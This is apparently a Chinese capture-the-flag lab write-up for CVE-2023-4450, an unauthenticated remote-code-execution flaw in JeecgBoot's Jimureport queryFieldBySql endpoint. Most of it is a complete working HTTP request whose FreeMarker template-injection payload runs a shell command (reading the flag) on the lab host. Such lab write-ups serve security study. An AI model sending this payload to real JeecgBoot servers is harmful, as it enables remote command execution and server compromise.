【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞

靶场介绍

JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

开启靶场

漏洞利用

在搜索POC时,会发现直接访问URL是404

随机点击一个文档编辑,发现路径是从jmreport开始的

poc 复制代码
POST /jmreport/queryFieldBySql HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: */*
Accept-Encoding: gzip, deflate, br
Host: eci-2zefpkb9jv5tzsaox5zq.cloudeci1.ichunqiu.com:8080
Content-Type: application/json
Content-Length: 103

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\" cat /flag \") }' "}

获取flag

相关推荐
liukuang1106 分钟前
Zara“夺命裤”风波,白晨铭的安全大考
安全
Android小码家41 分钟前
OWASP 移动应用安全之授权(MASTG-DEMO-0090)
android·安全·frida
Multipath7121 小时前
智能巡检机器人多链路聚合路由解决方案
网络·5g·安全·实时音视频·信息与通信
学习溢出1 小时前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
上海云盾-小余1 小时前
全链路多层防护体系,一站式拦截 DDoS、CC、爬虫与注入攻击
网络·爬虫·安全·ddos
潘潘的嵌入式日记1 小时前
一个宏在调试阶段挡住所有误操作
安全·嵌入式··调试·编译期·bring-up
renhongxia12 小时前
AI安全保卫战:我们如何防止“失控”的智能体?
人工智能·深度学习·安全·机器学习·架构·机器人
我不是QI2 小时前
Master PDF Editor 逆向复现
汇编·安全·pdf
8K超高清3 小时前
博冠获中国电影电视技术学会科技进步奖
人工智能·科技·算法·安全·接口隔离原则·智能硬件
momodira813 小时前
暑期安全短视频大赛线上投票制作教程
安全